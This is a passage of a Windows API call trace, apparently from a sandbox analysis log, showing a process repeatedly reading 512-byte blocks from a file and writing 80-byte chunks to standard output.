[0212.048] GetFileType (hFile=0x4c) returned 0x1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.048] _get_osfhandle (_FileHandle=1) returned 
0x4c [0212.048] GetFileType (hFile=0x4c) returned 0x1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] GetFileType (hFile=0x4c) returned 0x1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] GetFileType (hFile=0x4c) returned 0x1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] GetFileType (hFile=0x4c) returned 0x1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.048] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.048] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.048] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.048] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) 
returned 1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] GetFileType (hFile=0x4c) returned 0x1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] GetFileType (hFile=0x4c) returned 0x1 [0212.048] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.048] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] GetFileType (hFile=0x4c) returned 0x1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] GetFileType (hFile=0x4c) returned 0x1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] GetFileType (hFile=0x4c) returned 0x1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] GetFileType (hFile=0x4c) returned 0x1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: 
lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] GetFileType (hFile=0x4c) returned 0x1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] GetFileType (hFile=0x4c) returned 0x1 [0212.049] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.049] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.049] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.049] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.050] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0212.050] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.050] GetFileType (hFile=0x4c) returned 0x1 [0212.050] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0212.051] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.051] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.051] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] GetFileType (hFile=0x4c) returned 0x1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] GetFileType (hFile=0x4c) returned 0x1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] GetFileType (hFile=0x4c) returned 0x1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] GetFileType (hFile=0x4c) returned 0x1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 
[0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] GetFileType (hFile=0x4c) returned 0x1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] GetFileType (hFile=0x4c) returned 0x1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.051] GetFileType (hFile=0x4c) returned 0x1 [0212.051] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] GetFileType (hFile=0x4c) returned 0x1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.052] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.052] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.052] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.052] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, 
lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] GetFileType (hFile=0x4c) returned 0x1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] GetFileType (hFile=0x4c) returned 0x1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] GetFileType (hFile=0x4c) returned 0x1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] GetFileType (hFile=0x4c) returned 0x1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] GetFileType (hFile=0x4c) returned 0x1 [0212.052] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.052] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] GetFileType (hFile=0x4c) returned 0x1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] GetFileType (hFile=0x4c) returned 0x1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] GetFileType (hFile=0x4c) returned 0x1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.053] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.053] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] GetFileType (hFile=0x4c) returned 0x1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] GetFileType (hFile=0x4c) returned 0x1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] GetFileType 
(hFile=0x4c) returned 0x1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.053] GetFileType (hFile=0x4c) returned 0x1 [0212.053] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] GetFileType (hFile=0x4c) returned 0x1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] GetFileType (hFile=0x4c) returned 0x1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] GetFileType (hFile=0x4c) returned 0x1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] GetFileType (hFile=0x4c) returned 0x1 [0212.054] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.054] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.054] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] GetFileType (hFile=0x4c) returned 0x1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] GetFileType (hFile=0x4c) returned 0x1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.054] GetFileType (hFile=0x4c) returned 0x1 [0212.054] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] GetFileType (hFile=0x4c) returned 0x1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, 
lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] GetFileType (hFile=0x4c) returned 0x1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] GetFileType (hFile=0x4c) returned 0x1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] GetFileType (hFile=0x4c) returned 0x1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] GetFileType (hFile=0x4c) returned 0x1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.055] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.055] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] GetFileType (hFile=0x4c) returned 0x1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.055] GetFileType (hFile=0x4c) returned 0x1 [0212.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] GetFileType (hFile=0x4c) returned 0x1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] GetFileType (hFile=0x4c) returned 0x1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] GetFileType (hFile=0x4c) returned 0x1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] GetFileType (hFile=0x4c) returned 0x1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] WriteFile (in: 
